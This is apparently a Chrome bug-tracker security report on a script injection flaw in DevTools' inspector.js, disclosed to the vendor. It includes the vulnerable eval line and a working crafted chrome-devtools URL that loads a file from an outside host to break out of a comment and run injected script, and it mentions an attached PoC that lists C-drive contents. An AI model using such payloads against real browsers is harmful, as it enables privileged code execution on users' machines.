VULNERABILITY DETAILS
There is a *potential* arbitrary privilege script injection point in DevTools' inspector.js when it fetches the remote script code [as part of remoteBase param), and appends the script's URL as sourceURL at the end of the script's code.

This can be exploited only under rare special circumstances. 

Vulnerable Function:
function evaluateScript(sourceURL, scriptSource) {
  ..
  self.eval(scriptSource + "\n//# sourceURL=" + sourceURL); <-- sourceURL needs to be sanitized
}

Under normal circumstances, when chrome-devtools://devtools/bundled/inspector.html?remoteFrontend=true&remoteBase=[URL in https://chrome-devtools-frontend.appspot.com/] is accessed, it fetches "https://chrome-devtools-frontend.appspot.com/.../screencast_module.js". This URL is appended as comment to the source-code of remotely fetched screencast_module.js as "//# sourceURL=<URL>".

An attacker can control the full URI path (not the hostname) from where the remote "script" content is fetched by specifying the full URL as remoteBase followed by '?' to nullify the effect of DevTools appending screencast_module.js. Depending on the content that is fetched remotely, the newline sourceURL comment can be broken out of, if its made to be part of a multi-line comment. So, this gives an opportunity for the attacker to inject arbitrary script code by forcefully terminating the multiline comment, followed by malicious code.

VERSION
Chrome Version: 51.0.2704.103 m stable
Operating System: All

REPRODUCTION CASE
[ https://grpdmp.tk is currently using a self signed cert; so explicitly allow exception by visiting the URL first, before trying the below steps ]
Copy paste the following URL to Omnibar:
chrome-devtools://devtools/bundled/inspector.html?remoteFrontend=true&remoteBase=https://chrome-devtools-frontend.appspot.com/../grpdmp.tk/gchrome1/benign.txt?*/alert(document.domain);screencast_module={};screencast_module.js=0;dummy1=
( you should observe an alert that says "devtools" ).

For a PoC that dumps out the C-Drive contents (in Windows), please copy paste the URI in attached file(Devtools-Crafted-URI3.txt) into Omnibar.

I've made use of a benign text file that contains "/*" @ https://grpdmp.tk/gchrome1/benign.txt to demonstrate this possibility. 
Also, made use of  Issue 619414  in this PoC, since I couldn't locate a sample file on https://chrome-devtools-frontend.appspot.com/ domain that satisfies this criteria. 

 

Deleted: Devtools-Crafted-URI3.txt 1.4 KB

Devtools-Crafted-URI3.txt 1.4 KB View Download